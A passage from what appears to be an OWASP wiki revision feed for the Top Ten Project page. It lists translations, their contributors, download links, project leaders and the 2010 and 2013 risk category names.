Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235627</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235627"/>
				<updated>2017-11-19T22:59:01Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: 2017 translations note&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 Released==&lt;br /&gt;
The OWASP Top 10 - 2017 will be available for download on &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;20  November, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;. We are asking for comments to be submitted on the project's [https://github.com/OWASP/Top10/issues GitHub issues].&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* 2017 translations are currently underway&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.autodesk.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_2017_GM_(en).pdf | OWASP Top 10 2017 GM - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub](preferred)&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Oct 2017] OWASP Top 10 2017 - RC2 Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
